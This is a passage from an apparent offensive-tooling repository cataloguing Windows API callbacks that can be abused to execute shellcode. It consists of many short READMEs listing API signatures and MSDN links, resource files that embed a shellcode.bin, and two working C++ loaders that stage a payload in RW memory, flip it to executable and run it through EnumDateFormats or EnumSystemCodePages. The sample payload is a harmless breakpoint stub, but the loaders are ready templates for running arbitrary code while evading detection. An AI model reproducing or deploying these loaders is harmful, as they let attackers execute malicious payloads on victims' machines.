EnumCalendarInfoExA (CALINFO_ENUMPROCEXA lpCalInfoEnumProcEx, LCID Locale, CALID Calendar, CALTYPE CalType); 11 | 12 | BOOL EnumCalendarInfoExW (CALINFO_ENUMPROCEXA lpCalInfoEnumProcEx, LCID Locale, CALID Calendar, CALTYPE CalType); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumCalendarInfoExA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexa) 18 | - [MSDN EnumCalendarInfoExW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumCalendarInfoExEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumCalendarInfoExEx`. 8 | 9 | ```c++ 10 | BOOL EnumCalendarInfoExEx (CALINFO_ENUMPROCEXEX pCalInfoEnumProcExEx, LPCWSTR lpLocaleName, CALID Calendar, LPCWSTR lpReserved, CALTYPE CalType, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumCalendarInfoExEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexex) -------------------------------------------------------------------------------- /windows/execution/callback/EnumChildWindows/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumChildWindows`. 8 | 9 | ```c++ 10 | BOOL EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumChildWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumchildwindows) -------------------------------------------------------------------------------- /windows/execution/callback/EnumDateFormats/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumDateFormats`. 8 | 9 | ```c++ 10 | BOOL EnumDateFormatsA (DATEFMT_ENUMPROCA lpDateFmtEnumProc, LCID Locale, DWORD dwFlags); 11 | 12 | BOOL EnumDateFormatsW (DATEFMT_ENUMPROCW lpDateFmtEnumProc, LCID Locale, DWORD dwFlags); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumDateFormatsA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsa) 18 | - [MSDN EnumDateFormatsW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumDateFormats/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Abusing windows API to run shellcode as callback. 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: EnumDateFormats 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | int main () 21 | { 22 | void * runtime; 23 | BOOL retval; 24 | DWORD old_protect = 0; 25 | 26 | // shellcode storage in stack 27 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 28 | uint32_t payload_len = 4; 29 | 30 | // allocate memory buffer for payload as READ-WRITE (no executable) 31 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 32 | 33 | // copy payload to the buffer 34 | RtlMoveMemory (runtime, payload, payload_len); 35 | 36 | // make buffer executable (R-X) 37 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 38 | if (retval != 0) 39 | { 40 | EnumDateFormats ((DATEFMT_ENUMPROCA)runtime, LOCALE_SYSTEM_DEFAULT, 0); 41 | } 42 | 43 | // deallocate the space 44 | VirtualFree (runtime, payload_len, MEM_RELEASE); 45 | 46 | return 0; 47 | } -------------------------------------------------------------------------------- /windows/execution/callback/EnumDateFormatsEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumDateFormatsEx`. 8 | 9 | ```c++ 10 | BOOL EnumDateFormatsExA (DATEFMT_ENUMPROCEXA lpDateFmtEnumProcEx, LCID Locale, DWORD dwFlags); 11 | 12 | BOOL EnumDateFormatsExW (DATEFMT_ENUMPROCEXW lpDateFmtEnumProcEx, LCID Locale, DWORD dwFlags); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumDateFormatsExA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexa) 18 | - [MSDN EnumDateFormatsExW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumDateFormatsExEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumDateFormatsExEx`. 8 | 9 | ```c++ 10 | BOOL EnumDateFormatsExEx (DATEFMT_ENUMPROCEXEX lpDateFmtEnumProcExEx, LPCWSTR lpLocaleName, DWORD dwFlags, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumDateFormatsExEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexex) -------------------------------------------------------------------------------- /windows/execution/callback/EnumDesktopWindows/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumDesktopWindows`. 8 | 9 | ```c++ 10 | BOOL EnumDesktopWindows (HDESK hDesktop, WNDENUMPROC lpfn, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumDesktopWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopwindows) -------------------------------------------------------------------------------- /windows/execution/callback/EnumDesktops/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumDesktops`. 8 | 9 | ```c++ 10 | BOOL EnumDesktopsA (HWINSTA hwinsta, DESKTOPENUMPROCA lpEnumFunc, LPARAM lParam); 11 | 12 | BOOL EnumDesktopsW (HWINSTA hwinsta, DESKTOPENUMPROCW lpEnumFunc, LPARAM lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumDesktopsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopsa) 18 | - [MSDN EnumDesktopsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopsw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumDirTree/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumDirTree`. 8 | 9 | ```c++ 10 | BOOL IMAGEAPI EnumDirTree (HANDLE hProcess, PCSTR RootPath, PCSTR InputPathName, PSTR OutputPathBuffer, PENUMDIRTREE_CALLBACK cb, PVOID data); 11 | 12 | BOOL IMAGEAPI EnumDirTreeW (HANDLE hProcess, PCWSTR RootPath, PCWSTR InputPathName, PWSTR OutputPathBuffer, PENUMDIRTREE_CALLBACKW cb, PVOID data); 13 | 14 | BOOL IMAGEAPI SymInitialize (HANDLE hProcess, PCSTR UserSearchPath, BOOL fInvadeProcess); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN EnumDirTree](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumdirtree) 20 | - [MSDN EnumDirTreeW](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumdirtreew) 21 | - [MSDN SymInitialize](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-syminitialize) -------------------------------------------------------------------------------- /windows/execution/callback/EnumDisplayMonitors/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumDisplayMonitors`. 8 | 9 | ```c++ 10 | BOOL EnumDisplayMonitors (HDC hdc, LPCRECT lprcClip, MONITORENUMPROC lpfnEnum, LPARAM dwData); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumDisplayMonitors](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdisplaymonitors) -------------------------------------------------------------------------------- /windows/execution/callback/EnumFontFamilies/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumFontFamilies`. 8 | 9 | ```c++ 10 | int EnumFontFamiliesA (HDC hdc, LPCSTR lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam); 11 | 12 | int EnumFontFamiliesW (HDC hdc, LPCWSTR lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam); 13 | 14 | HDC GetDC (HWND hWnd); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN EnumFontFamiliesA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesa) 20 | - [MSDN EnumFontFamiliesW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesw) 21 | - [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc) -------------------------------------------------------------------------------- /windows/execution/callback/EnumFontFamiliesEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumFontFamiliesEx`. 8 | 9 | ```c++ 10 | int EnumFontFamiliesExA(HDC hdc, LPLOGFONTA lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam, DWORD dwFlags); 11 | 12 | int EnumFontFamiliesExA(HDC hdc, LPLOGFONTW lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam, DWORD dwFlags); 13 | 14 | HDC GetDC (HWND hWnd); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN EnumFontFamiliesExA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesexa) 20 | - [MSDN EnumFontFamiliesExW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesexw) 21 | - [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc) -------------------------------------------------------------------------------- /windows/execution/callback/EnumFonts/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumFonts`. 8 | 9 | ```c++ 10 | int EnumFontsA (HDC hdc, LPCSTR lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam); 11 | 12 | int EnumFontsW (HDC hdc, LPCWSTR lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam); 13 | 14 | HDC GetDC (HWND hWnd); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN EnumFontsA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontsa) 20 | - [MSDN EnumFontsW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontsw) 21 | - [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc) -------------------------------------------------------------------------------- /windows/execution/callback/EnumLanguageGroupLocales/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumLanguageGroupLocales`. 8 | 9 | ```c++ 10 | BOOL EnumLanguageGroupLocalesA (LANGGROUPLOCALE_ENUMPROCA lpLangGroupLocaleEnumProc, LGRPID LanguageGroup, DWORD dwFlags, LONG_PTR lParam); 11 | 12 | BOOL EnumLanguageGroupLocalesW (LANGGROUPLOCALE_ENUMPROCW lpLangGroupLocaleEnumProc, LGRPID LanguageGroup, DWORD dwFlags, LONG_PTR lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumLanguageGroupLocalesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumlanguagegrouplocalesa) 18 | - [MSDN EnumLanguageGroupLocalesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumlanguagegrouplocalesw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumMetaFile/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumMetaFile`. 8 | 9 | ```c++ 10 | BOOL EnumMetaFile(HDC hdc, HMETAFILE hmf, MFENUMPROC proc, LPARAM param); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumMetaFile](https://learn.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enummetafile) -------------------------------------------------------------------------------- /windows/execution/callback/EnumObjects/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumObjects`. 8 | 9 | ```c++ 10 | int EnumObjects (HDC hdc, int nType, GOBJENUMPROC lpFunc, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumObjects](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumobjects) -------------------------------------------------------------------------------- /windows/execution/callback/EnumPageFiles/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumPageFiles`. 8 | 9 | ```c++ 10 | BOOL EnumPageFilesA (PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine, LPVOID pContext); 11 | 12 | BOOL EnumPageFilesW (PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine, LPVOID pContext); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumPageFilesA](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumpagefilesa) 18 | - [MSDN EnumPageFilesW](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumpagefilesw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumProps/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumProps`. 8 | 9 | ```c++ 10 | int EnumPropsA (HWND hWnd, PROPENUMPROCA lpEnumFunc); 11 | 12 | int EnumPropsW (HWND hWnd, PROPENUMPROCW lpEnumFunc); 13 | 14 | BOOL SetPropA (HWND hWnd, LPCSTR lpString, HANDLE hData); 15 | 16 | BOOL SetPropW (HWND hWnd, LPCWSTR lpString, HANDLE hData); 17 | 18 | HANDLE RemovePropA (HWND hWnd, LPCSTR lpString); 19 | 20 | HANDLE RemovePropW (HWND hWnd, LPCWSTR lpString); 21 | ``` 22 | 23 | ### Reference 24 | 25 | - [MSDN EnumPropsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsa) 26 | - [MSDN EnumPropsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsw) 27 | - [MSDN SetPropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropa) 28 | - [MSDN SetPropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropw) 29 | - [MSDN RemovePropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropa) 30 | - [MSDN RemovePropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropw) 31 | - [MSDN GetTopWindow](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-gettopwindow) -------------------------------------------------------------------------------- /windows/execution/callback/EnumPropsEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumPropsEx`. 8 | 9 | ```c++ 10 | int EnumPropsExA (HWND hWnd, PROPENUMPROCEXA lpEnumFunc, LPARAM lParam); 11 | 12 | int EnumPropsExW (HWND hWnd, PROPENUMPROCEXW lpEnumFunc, LPARAM lParam); 13 | 14 | BOOL SetPropA (HWND hWnd, LPCSTR lpString, HANDLE hData); 15 | 16 | BOOL SetPropW (HWND hWnd, LPCWSTR lpString, HANDLE hData); 17 | 18 | HANDLE RemovePropA (HWND hWnd, LPCSTR lpString); 19 | 20 | HANDLE RemovePropW (HWND hWnd, LPCWSTR lpString); 21 | ``` 22 | 23 | ### Reference 24 | 25 | - [MSDN EnumPropsExA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsexa) 26 | - [MSDN EnumPropsExW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsexw) 27 | - [MSDN SetPropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropa) 28 | - [MSDN SetPropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropw) 29 | - [MSDN RemovePropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropa) 30 | - [MSDN RemovePropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropw) 31 | - [MSDN GetTopWindow](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-gettopwindow) -------------------------------------------------------------------------------- /windows/execution/callback/EnumPwrSchemes/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumPwrSchemes`. 8 | 9 | ```c++ 10 | BOOLEAN EnumPwrSchemes (PWRSCHEMESENUMPROC lpfn, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumPwrSchemes](https://docs.microsoft.com/en-us/windows/win32/api/powrprof/nf-powrprof-enumpwrschemes) -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceLanguages/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumResourceLanguages`. 8 | 9 | ```c++ 10 | BOOL EnumResourceLanguagesA(HMODULE hModule, LPCSTR lpType, LPCSTR lpName, ENUMRESLANGPROCA lpEnumFunc, LONG_PTR lParam); 11 | 12 | BOOL EnumResourceLanguagesW(HMODULE hModule, LPCWSTR lpType, LPCWSTR lpName, ENUMRESLANGPROCW lpEnumFunc, LONG_PTR lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumResourceLanguagesA](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcelanguagesa) 18 | - [MSDN EnumResourceLanguagesW](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcelanguagesw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceLanguages/c++/resources.h: -------------------------------------------------------------------------------- 1 | #define REVID_STRING 1 2 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceLanguages/c++/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | STRINGTABLE 4 | BEGIN 5 | REVID_STRING, "ReversingID" 6 | END -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNames/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumResourceNames`. 8 | 9 | Enumerasi resource types di dalam module dan eksekusi callback untuk memproses tiap resource type yang diidentifikasi. 10 | 11 | ```c++ 12 | BOOL EnumResourceNamesA (HMODULE hModule, LPCSTR lpType, ENUMRESNAMEPROCA lpEnumFunc, LONG_PTR lParam); 13 | 14 | BOOL EnumResourceNamesW (HMODULE hModule, LPCWSTR lpType, ENUMRESNAMEPROCW lpEnumFunc, LONG_PTR lParam); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN EnumResourceNamesA](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesa) 20 | - [MSDN EnumResourceNamesW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNames/c++/resource-self/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | #define ID_STRING 101 3 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNames/c++/resource-self/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | SHELLCODE RCDATA shellcode.bin 4 | 5 | STRINGTABLE 6 | BEGIN 7 | ID_STRING "Reversing.ID Shellcode Loader" 8 | END -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNames/c++/resource-self/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/execution/callback/EnumResourceNames/c++/resource-self/shellcode.bin -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNamesEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumResourceNamesEx`. 8 | 9 | Enumerasi resource types di dalam module dan eksekusi callback untuk memproses tiap resource type yang diidentifikasi. 10 | 11 | ```c++ 12 | BOOL EnumResourceNamesExA (HMODULE hModule, LPCSTR lpType, ENUMRESNAMEPROCA lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId); 13 | 14 | BOOL EnumResourceNamesExW (HMODULE hModule, LPCWSTR lpType, ENUMRESNAMEPROCW lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN EnumResourceNamesExA](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesexa) 20 | - [MSDN EnumResourceNamesExW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesexw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNamesEx/c++/resource-self/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | #define ID_STRING 101 3 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNamesEx/c++/resource-self/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | SHELLCODE RCDATA shellcode.bin 4 | 5 | STRINGTABLE 6 | BEGIN 7 | ID_STRING "Reversing.ID Shellcode Loader" 8 | END -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNamesEx/c++/resource-self/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/shellcode.bin -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypes/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumResourceTypes`. 8 | 9 | Enumerasi resource types di dalam module dan eksekusi callback untuk memproses tiap resource type yang diidentifikasi. 10 | 11 | ```c++ 12 | BOOL EnumResourceTypesA (HMODULE hModule, ENUMRESTYPEPROCA lpEnumFunc, LONG_PTR lParam); 13 | 14 | BOOL EnumResourceTypesW (HMODULE hModule, ENUMRESTYPEPROCW lpEnumFunc, LONG_PTR lParam); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN EnumResourceTypesA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa) 20 | - [MSDN EnumResourceTypesW](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypes/c++/resource-self/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypes/c++/resource-self/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | SHELLCODE RCDATA shellcode.bin -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypes/c++/resource-self/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/execution/callback/EnumResourceTypes/c++/resource-self/shellcode.bin -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypesEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumResourceTypesEx`. 8 | 9 | Enumerasi resource types di dalam module dan eksekusi callback untuk memproses tiap resource type yang diidentifikasi. 10 | 11 | ```c++ 12 | BOOL EnumResourceTypesExA (HMODULE hModule, ENUMRESTYPEPROCA lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId); 13 | 14 | BOOL EnumResourceTypesExW (HMODULE hModule, ENUMRESTYPEPROCW lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN EnumResourceTypesExA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa) 20 | - [MSDN EnuMResourceTypesExW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcetypesexw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypesEx/c++/resource-self/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypesEx/c++/resource-self/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | SHELLCODE RCDATA shellcode.bin -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypesEx/c++/resource-self/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/shellcode.bin -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemCodePages/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumSystemCodePages`. 8 | 9 | ```c++ 10 | BOOL EnumSystemCodePagesA (CODEPAGE_ENUMPROCA lpCodePageEnumProc, DWORD dwFlags); 11 | 12 | BOOL EnumSystemCodePagesW (CODEPAGE_ENUMPROCW lpCodePageEnumProc, DWORD dwFlags); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumSystemCodePagesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemcodepagesa) 18 | - [MSDN EnumSystemCodePagesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemcodepagesw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemCodePages/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Abusing windows API to run shellcode as callback. 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: EnumSystemCodePages 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | int main () 21 | { 22 | void * runtime; 23 | BOOL retval; 24 | DWORD old_protect = 0; 25 | 26 | // shellcode storage in stack 27 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 28 | uint32_t payload_len = 4; 29 | 30 | // allocate memory buffer for payload as READ-WRITE (no executable) 31 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 32 | 33 | // copy payload to the buffer 34 | RtlMoveMemory (runtime, payload, payload_len); 35 | 36 | // make buffer executable (R-X) 37 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 38 | if (retval != 0) 39 | { 40 | EnumSystemCodePages ((CODEPAGE_ENUMPROCA)runtime, 0); 41 | } 42 | 43 | // deallocate the space 44 | 